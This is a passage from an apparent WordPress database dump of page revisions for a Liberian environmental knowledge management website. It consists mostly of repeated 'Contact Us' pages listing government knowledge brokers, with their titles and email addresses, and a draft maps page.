300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-22 15:48:02','2021-02-22 15:48:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3505,42,'2021-02-22 15:48:02','2021-02-22 15:48:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony A. Yokie</strong><br />Manager<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a></p><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-22 15:48:02','2021-02-22 15:48:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3507,42,'2021-02-24 11:43:04','2021-02-24 11:43:04','<!-- wp:paragraph -->\n<p> Coming soon! </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"ids\":[2946]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-1024x791.jpg\" alt=\"\" data-id=\"2946\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-land-cover-map-2015-1/\" class=\"wp-image-2946\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong>Liberia Land Cover Map</strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"ids\":[2947]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-1024x791.jpg\" alt=\"\" data-id=\"2947\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-species-richness-high-biodiversity-corridor-map2/\" class=\"wp-image-2947\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong> Liberia Species Richness Map </strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":2948} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Extreme-Poverty-Map-1-1024x791.jpg\" alt=\"\" class=\"wp-image-2948\"/><figcaption><strong>Liberia Extreme Poverty Map by Region (HIES 2014)</strong></figcaption></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:jetpack/map {\"points\":[{\"placeTitle\":\"Liberia\",\"title\":\"Liberia\",\"caption\":\"Liberia\",\"id\":\"country.11981004792290980\",\"coordinates\":{\"longitude\":-9.75,\"latitude\":6.53333}}],\"zoom\":11.292581973058338,\"mapCenter\":{\"lng\":-9.75,\"lat\":6.53333}} -->\n<div class=\"wp-block-jetpack-map\" data-map-style=\"default\" data-map-details=\"true\" data-points=\"[{&quot;placeTitle&quot;:&quot;Liberia&quot;,&quot;title&quot;:&quot;Liberia&quot;,&quot;caption&quot;:&quot;Liberia&quot;,&quot;id&quot;:&quot;country.11981004792290980&quot;,&quot;coordinates&quot;:{&quot;longitude&quot;:-9.75,&quot;latitude&quot;:6.53333}}]\" data-zoom=\"11.292581973058338\" data-map-center=\"{&quot;lng&quot;:-9.75,&quot;lat&quot;:6.53333}\" data-marker-color=\"red\" data-show-fullscreen-button=\"true\"><ul><li><a href=\"https://www.google.com/maps/search/?api=1&amp;query=6.53333,-9.75\">Liberia</a></li></ul></div>\n<!-- /wp:jetpack/map -->','Maps','','inherit','closed','closed','','108-autosave-v1','','','2021-02-24 11:43:04','2021-02-24 11:43:04','',108,'https://ekmsliberia.info/108-autosave-v1/',0,'revision','',0),(3509,42,'2021-02-25 15:18:15','2021-02-25 15:18:15','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony A. Yokie</strong><br />Manager<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a></p><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br 